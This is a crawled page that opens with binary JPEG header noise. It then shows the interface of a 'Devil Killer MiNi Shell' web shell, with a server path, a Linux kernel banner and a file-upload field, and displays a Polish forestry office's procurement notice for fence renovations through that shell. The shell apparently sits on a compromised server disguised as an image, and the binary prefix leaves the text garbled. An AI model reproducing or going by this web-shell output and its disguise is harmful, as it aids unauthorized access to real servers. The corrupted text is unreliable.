JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230922/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230922/0040948201-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont ogrodzeń leśniczówek Leśnictw Wierzysko, Zabrody, Karsin i leśniczówki szkółki leśnej w Bąku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Kościerzyna</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 190036743</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Marii Skłodowskiej-Curie 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kościerzyna</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">83-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL637 - Chojnicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">koscierzyna@gdansk.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.koscierzyna.gdansk.lasy.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Leśnictwo - gospodarka leśna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont ogrodzeń leśniczówek Leśnictw Wierzysko, Zabrody, Karsin i leśniczówki szkółki leśnej w Bąku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2d0c6655-5625-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00409482</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-09-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00073544/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Remont ogrodzeń leśniczówek Leśnictw Wierzysko, Zabrody, Karsin i szkółki leśnej w Bąku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/lasy_koscierzyna <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest w języku polskim w formie elektronicznej za<br/>pośrednictwem platformy zakupowej pod adresem: https://platformazakupowa.pl/pn/lasy_koscierzyna</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający, zgodnie z<br/>Rozporządzeniem Prezesa Rady Ministrów z dnia 31 grudnia 2020 roku w sprawie sposobu sporządzania i przekazywania informacji<br/>oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz. 2452), określa niezbędne wymagania sprzętowo – aplikacyjne<br/>umożliwiające pracę na platformazakupowa.pl, tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych – MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>3) zainstalowana dowolna inna przeglądarka internetowa niż Internet Explorer,<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6) szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3,<br/>7) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany według<br/>czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania<br/>wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu<br/>platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje.<br/>Formaty plików wykorzystywanych przez wykonawców powinny być zgodne z “OBWIESZCZENIEM PREZESA RADY MINISTRÓW<br/>z dnia 9 listopada 2017 roku w sprawie ogłoszenia jednolitego tekstu rozporządzenia Rady Ministrów w sprawie Krajowych Ram<br/>Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych<br/>wymagań dla systemów teleinformatycznych”.<br/>Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze szczególnym wskazaniem na .pdf<br/>W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów:<br/>1) Zip,<br/>2) 7Z.<br/>Wśród formatów powszechnych a NIE występujących w rozporządzeniu występują: .rar .gif .bmp .numbers .pages. Dokumenty<br/>złożone w takich plikach zostaną uznane za złożone nieskutecznie.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1) administratorem Pani/Pana danych osobowych jest Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Kościerzyna<br/>z siedzibą w (83-400) Kościerzynie przy ulicy Marii Skłodowskiej-Curie 6, tel. 58 689 28 69, e-mail: koscierzyna@gdansk.lasy.gov.pl;<br/>2) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego „Remont czterech ogrodzeń leśniczówek Leśnictw Ludwikowo, Grzybowski Młyn, Nowa<br/>Kiszewa, Wdzydze” – znak sprawy: SA.270.6.2.2022, prowadzonym w trybie podstawowym;<br/>3) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2021 r. poz. 1129 ze zm.),<br/>dalej „ustawa Pzp”;<br/>4) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>5) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>6) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO;<br/>7) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>8) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust.1-3 Rozporządzenia 2016/679 wymagałoby niewspółmiernie<br/>dużego wysiłku, Zamawiający zastrzega sobie prawo żądania od osoby, której dane dotyczą wskazania dodatkowych informacji<br/>mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia<br/>publicznego lub konkursu.<br/>Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 Rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych<br/>do czasu zakończenia postępowania o udzielenie zamówienia publicznego lub konkursu.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA.270.6.3.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 514229,99 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	CZĘŚĆ ZAMÓWIENIA NR 1 – Remont ogrodzenia leśniczówki Leśnictwa Wierzysko.<br/><br/>Opis przedmiotu zamówienia:<br/>Realizacja robót budowlanych, objętych niniejsza częścią zamówienia, polegać będzie na wykonaniu ścinki, karczowaniu krzaków oraz poszyć roślinnych, rozbiórki istniejącego ogrodzenia z siatki i sztachet na słupkach wraz z fundamentem betonowym w całości wraz z wywiezieniem materiałów rozbiórkowych z terenu działki na miejscowe składowisko odpadów budowlanych. Materiały niebezpieczne dla środowiska należy zutylizować w specjalnych zakładach – zgodnie z obowiązującymi w tym zakresie przepisami. Ostatnim etapem realizacji zamówienia będzie wykonanie projektowanego ogrodzenia z desek kompozytowych, siatki oraz murowanego.<br/>Szczegółowe dane dotyczące przedmiotu zamówienia zawarte są w przedmiarze robót budowlanych stanowiącym załącznik nr 9 do Specyfikacji Warunków Zamówienia, zwanej dalej SWZ, w szczegółowych specyfikacjach technicznych wykonania i odbioru robót budowlanych, które stanowią załącznik nr 10 do SWZ oraz w dokumentacji projektowej, na którą składają się: projekt architektoniczno-budowlany, projekt zagospodarowania terenu budowlanym, informacja dotycząca bezpieczeństwa i ochrony zdrowia, stanowiącej załącznik nr 11 do SWZ.<br/><br/><br/>Miejsce lokalizacji zamówienia publicznego:<br/>Przedmiotowa droga jest zlokalizowana, zgodnie z adresem leśnym, na terenie Regionalnej Dyrekcji Lasów Państwowych w Gdańsku, w Nadleśnictwie Kościerzyna, w Leśnictwie Wierzysko, w oddziale 219i. <br/>Zgodnie z powszechną ewidencją gruntów, przedmiot niniejszego zamówienia położony jest w Województwie Pomorskim, na terenie Powiatu Kościerskiego, na obszarze gminy Kościerzyna, w obrębie ewidencyjnym Rybaki, na działce ewidencyjnej nr 472/5.<br/>Zgodnie z adresem pocztowym, przedmiot zamówienia jest położony w Wierzysko Leśnictwo 1, kod pocztowy: 83-400 Kościerzyna.<br/><br/>Gwarancja jakości i rękojmia udzielone przez Wykonawcę na wykonany przedmiot zamówienia winny wynosić co najmniej 24 miesięcy i nie więcej niż 60 miesięcy. Zamawiający może wykorzystać niezależnie od uprawnień wynikających z gwarancji, uprawnienia z rękojmi w okresie udzielonej przez Wykonawcę gwarancji. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 140903,50 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45342000-6 - Wznoszenie ogrodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">50 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający<br/>przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp, dla wszystkich części zamówienia. Poniższe<br/>postanowienia odnoszą się do każdej z części zamówienia.<br/>2 Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7 PZP, w okresie 3 lat od dnia<br/>udzielenia zamówienia podstawowego. Zamówienia te polegać będą na powtórzeniu robót budowlanych podobnych do robót<br/>budowlanych stanowiących przedmiot niniejszego zamówienia.<br/>3 Zakresem rzeczowym robót budowlanych stanowiących przedmiot zamówień, o których mowa w pkt 5.2 objęte będą czynności<br/>określone w załączonych do SWZ, przedmiarze robót, których opis technologii wykonania przedstawia specyfikacja techniczna<br/>wykonania i odbioru robót oraz roboty budowlane podobne do nich oraz w projekcie budowlanym.<br/>4 Zakres rzeczowy robót budowlanych stanowiących przedmiot zamówień, o których mowa w pkt 5.2 nie przekroczy wartości 50%<br/>wartości niniejszego zamówienia.<br/>5 Zamówienia, o których mowa w pkt 5.2 będą udzielane po przeprowadzeniu odrębnego postępowania o udzielenie zamówienia<br/>publicznego w trybie zamówienia z wolnej ręki.<br/>6 Zamówienia, o których mowa w pkt 5.2 będą udzielane w przypadku wystąpienia potrzeby zwiększenia zakresu rzeczowego robót,<br/>stanowiących przedmiot zamówienia na skutek zaistnienia zmian w rozmiarze przedmiotowego zamówienia oraz wystąpienia<br/>nowych zadań gospodarczych lub publicznych.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą uznana zostanie Oferta Wykonawcy, która otrzyma<br/>najwyższa sumę punktów w niżej wymienionych kryteriach oceny ofert. Oferta może uzyskać maksymalnie 100 punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja jakości i rękojmia za wady</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji zadania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2)	CZĘŚĆ ZAMÓWIENIA NR 2 – Remont ogrodzenia leśniczówki Leśnictwa Zabrody.<br/><br/>Opis przedmiotu zamówienia:<br/>Realizacja robót budowlanych, objętych niniejsza częścią zamówienia, polegać będzie na wykonaniu ścinki, karczowaniu krzaków oraz poszyć roślinnych, rozbiórki istniejącego ogrodzenia z siatki i sztachet na słupkach wraz z fundamentem betonowym w całości wraz z wywiezieniem materiałów rozbiórkowych z terenu działki na miejscowe składowisko odpadów budowlanych. Materiały niebezpieczne dla środowiska należy zutylizować w specjalnych zakładach – zgodnie z obowiązującymi w tym zakresie przepisami. Ostatnim etapem realizacji zamówienia będzie wykonanie projektowanego ogrodzenia z desek kompozytowych, siatki oraz murowanego.<br/>Szczegółowe dane dotyczące przedmiotu zamówienia zawarte są w przedmiarze robót budowlanych stanowiącym załącznik nr 12 do SWZ, w szczegółowych specyfikacjach technicznych wykonania i odbioru robót budowlanych, które stanowią załącznik nr 13 do SWZ oraz w dokumentacji projektowej, na którą składają się: projekt architektoniczno-budowlany, projekt zagospodarowania terenu budowlanym, informacja dotycząca bezpieczeństwa i ochrony zdrowia, stanowiącej załącznik nr 14 do SWZ.<br/><br/>Miejsce lokalizacji zamówienia publicznego:<br/>Przedmiotowa droga jest zlokalizowana, zgodnie z adresem leśnym, na terenie Regionalnej Dyrekcji Lasów Państwowych w Gdańsku, w Nadleśnictwie Kościerzyna, w Leśnictwie Zabrody, w oddziale 582l. <br/>Zgodnie z powszechną ewidencją gruntów, przedmiot niniejszego zamówienia położony jest w Województwie Pomorskim, na terenie Powiatu Kościerskiego, na obszarze gminy Karsin, w obrębie ewidencyjnym Wdzydze Tucholskie, na działce ewidencyjnej nr 582.<br/>Zgodnie z adresem pocztowym, przedmiot zamówienia jest położony w Zabrodach 1 (leśniczówka), kod pocztowy: 83-442 Borsk.<br/><br/>Gwarancja jakości i rękojmia udzielone przez Wykonawcę na wykonany przedmiot zamówienia winny wynosić co najmniej 24 miesięcy i nie więcej niż 60 miesięcy. Zamawiający może wykorzystać niezależnie od uprawnień wynikających z gwarancji, uprawnienia z rękojmi w okresie udzielonej przez Wykonawcę gwarancji. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 133511,07 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45342000-6 - Wznoszenie ogrodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">50 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający<br/>przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp, dla wszystkich części zamówienia. Poniższe<br/>postanowienia odnoszą się do każdej z części zamówienia.<br/>2 Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7 PZP, w okresie 3 lat od dnia<br/>udzielenia zamówienia podstawowego. Zamówienia te polegać będą na powtórzeniu robót budowlanych podobnych do robót<br/>budowlanych stanowiących przedmiot niniejszego zamówienia.<br/>3 Zakresem rzeczowym robót budowlanych stanowiących przedmiot 